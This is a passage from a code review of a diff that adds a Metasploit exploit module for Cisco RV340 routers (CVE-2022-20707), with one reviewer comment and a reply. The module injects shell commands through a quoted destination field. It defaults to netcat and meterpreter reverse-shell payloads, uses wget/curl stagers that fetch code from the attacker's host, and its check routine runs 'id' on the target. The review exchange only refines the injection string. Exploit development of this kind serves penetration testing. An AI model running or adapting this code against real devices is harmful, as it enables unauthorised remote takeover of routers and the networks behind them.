modules/exploits/linux/http/cisco_rv340_lan.rb

```diff
@@ -0,0 +1,163 @@
+          [ 'CVE', '2022-20707']
+        ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+                'BadChars' => '\''
+              },
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/'])
+      ]
+    )
+  end
+
+  def check
+    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
+    # Test to see if router is responding and possibly vulnerable
+    res = send_exploit('id')
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
+
+    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
+      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
+    end
+
+    CheckCode::Safe('The target did not respond with an expected payload.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_exploit(cmd)
+
+    if target['Type'] != :unix_cmd
+      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
+      body_json = res.get_json_document
+      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
+    end
+
+    print_good('Exploit successfully executed.')
+  end
+
+  def send_exploit(cmd)
+    send_request_cgi( {
+                        'encode_params' => false,
+                        'method' => 'POST',
+                        'uri' => '/jsonrpc',
+                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
+                        })
+
+    filepath = '/tmp/upload.input'
+    filename = 'bienpnn'
+    pathparam = 'Configuration'
+    fileparam = 'bienpnn'
+
+    destination = '\'; ' + cmd + " #"
```

Comment:
This can be replaced with `destination = "';" + cmd + "#" I think

Reply:
Thanks for suggestion.  Added change.